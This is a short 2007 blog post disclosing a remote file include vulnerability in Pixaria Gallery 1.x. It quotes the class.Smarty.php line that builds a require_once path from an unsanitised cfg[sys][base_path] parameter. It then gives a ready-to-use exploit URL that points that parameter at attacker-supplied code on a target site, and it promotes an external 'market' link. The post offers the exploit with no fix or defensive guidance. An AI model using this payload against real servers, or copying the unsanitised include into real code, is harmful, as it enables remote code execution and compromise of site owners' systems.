Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
By addrsinfo
/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");
Exploit:
http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
wanna see more http://market.addrs.info
This entry was posted on April 16, 2007 at 1:23 pm and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
